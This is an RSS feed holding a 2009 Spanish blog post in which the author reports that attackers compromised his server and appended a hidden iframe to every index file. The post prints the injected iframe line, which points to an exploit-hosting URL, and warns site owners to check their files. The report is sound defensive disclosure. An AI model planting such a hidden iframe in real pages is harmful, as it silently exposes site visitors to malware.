<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Blog de Óscar del Río &#187; seguridad</title>
	<atom:link href="http://oscardelrio.interacso.com/temas/seguridad/feed/" rel="self" type="application/rss+xml" />
	<link>http://oscardelrio.interacso.com</link>
	<description>1kg de tecnología, 250g de sociedad, economía y otras especias</description>
	<lastBuildDate>Fri, 02 Jul 2010 09:26:53 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>¡Cuidado! Podrías estar redirigiendo a tus usuarios a sitios Malware</title>
		<link>http://oscardelrio.interacso.com/podrias-estar-redirigiendo-a-tus-usuarios-a-sitios-malware/</link>
		<comments>http://oscardelrio.interacso.com/podrias-estar-redirigiendo-a-tus-usuarios-a-sitios-malware/#comments</comments>
		<pubDate>Sat, 22 Aug 2009 20:00:31 +0000</pubDate>
		<dc:creator>Óscar del Río</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Seguridad / Privacidad]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[privacidad]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://oscardelrio.interacso.com/?p=548</guid>
		<description><![CDATA[
Desde anoche hasta esta tarde el blog no funcionaba. Fue debido a que unos atacantes comprometieron la seguridad de mi servidor (parece ser que el ftp) consiguiendo editar con éxito todos y cada uno de los ficheros que contenían la cadena &#8220;index&#8221; en su nombre (index.php,  index.html, index_extra.php&#8230;) en las diferentes carpetas del mismo.
La edición [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter size-medium wp-image-549" title="wallpaperxl0[1]" src="http://oscardelrio.interacso.com/wp-content/uploads/wallpaperxl01-300x250.jpg" alt="wallpaperxl0[1]" width="300" height="250" /><br />
Desde anoche hasta esta tarde <a href="http://oscardelrio.interacso.com" target="_blank">el blog</a> no funcionaba. Fue debido a que unos atacantes comprometieron la seguridad de mi servidor (parece ser que el ftp) consiguiendo editar con éxito todos y cada uno de los ficheros que contenían la cadena &#8220;index&#8221; en su nombre (index.php,  index.html, index_extra.php&#8230;) en las diferentes carpetas del mismo.</p>
<p>La edición de los ficheros consistió en añadir una línea al final de todos ellos (index.htm, index.php&#8230;) con el siguiente código:</p>
<pre class="brush: html">&lt;iframe src=&quot;http://f5l.at:8080/ts/in.cgi?pepsi154&quot; width=125 height=125 style=&quot;visibility: hidden&quot;&gt;&lt;/iframe&gt;</pre>
<p>El objetivo era utilizar mi servidor para hacer un ataque de <a href="http://en.wikipedia.org/wiki/Frame_injection" target="_blank">Frame Injection</a> dirigiendo a los visitantes de mi sitio a la url http://f5l.at:8080/ts/in.cgi?pepsi154, en la que está alojado el exploit dirigido al usuario final, que presumiblemente intentará obtener datos privados del mismo o instalar software malicioso en su equipo.</p>
<p>Me di cuenta &#8220;gracias&#8221; a que Wordpress dejó de funcionar, por lo que la pérdida del servicio que ha sufrido el blog ha sido, más que un problema, un aviso.</p>
<p>Además, este tipo de ataques no solo pueden dañar al visitante de tu sitio sino que pueden hacer que tu dominio acabe en un <a href="http://www.malwareurl.com/search.php?domain=&amp;page=1&amp;s=91.121&amp;rp=200&amp;ip=on&amp;reverse=on&amp;as=on&amp;urls=on" target="_blank">listado de sitios malware</a>.</p>
<p>Ahora conviene estar alerta, a partir de hoy cada día revisaré si existen ficheros modificados en mi servidor web ya que no me gustaría enviar a mis visitantes a merced de los atacantes.</p>
<p>He buscado información sobre la URL y he visto a otra  persona que le ha sucedido lo mismo:</p>
<p><a href="http://exbb.org/community/topic.php?forum=6&amp;topic=127&amp;postid=1250884659" target="_blank">http://exbb.org/community/topic.php?forum=6&amp;topic=127&amp;postid=1250884659</a></p>
<p>(Para quienes no entiendan Ruso, entre los que me incluyo <img src='http://oscardelrio.interacso.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> , <a href="http://translate.google.es/translate?u=http%3A%2F%2Fexbb.org%2Fcommunity%2Ftopic.php%3Fforum%3D6%26topic%3D127%26postid%3D1250884659&amp;sl=ru&amp;tl=es&amp;hl=es&amp;ie=UTF-8" target="_blank">Aquí el link semitraducido por Google</a>)</p>
<p>¿A alguien más le ha pasado?</p>
<p>Comprueba tus ficheros habitualmente, podrías estar redirigiendo sin saberlo a tus usuarios a un sitio Malware<br />
<h3>Entradas más leídas</h3>
<ul class="related_post">
<li><a href="http://oscardelrio.interacso.com/invitaciones-spotify/" title="Invitaciones Spotify">Invitaciones Spotify</a></li>
<li><a href="http://oscardelrio.interacso.com/evitar-sorpresas-en-la-factura-con-vodafone-y-blackberry-storm/" title="Evitar sorpresas en la factura con Vodafone y Blackberry Storm">Evitar sorpresas en la factura con Vodafone y Blackberry Storm</a></li>
<li><a href="http://oscardelrio.interacso.com/impresiones-firmware-4-7-0-151-blackberry-storm/" title="Impresiones Firmware 4.7.0.151 Blackberry Storm 9500">Impresiones Firmware 4.7.0.151 Blackberry Storm 9500</a></li>
<li><a href="http://oscardelrio.interacso.com/nuevo-firmware-47090-beta-para-la-blackberry-storm/" title="Nuevo Firmware 4.7.0.90 beta para la Blackberry Storm">Nuevo Firmware 4.7.0.90 beta para la Blackberry Storm</a></li>
<li><a href="http://oscardelrio.interacso.com/nuevo-firmware-para-la-blackberry-storm-9500-470100/" title="Nuevo Firmware para la Blackberry Storm 9500 (4.7.0.100)">Nuevo Firmware para la Blackberry Storm 9500 (4.7.0.100)</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://oscardelrio.interacso.com/podrias-estar-redirigiendo-a-tus-usuarios-a-sitios-malware/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>
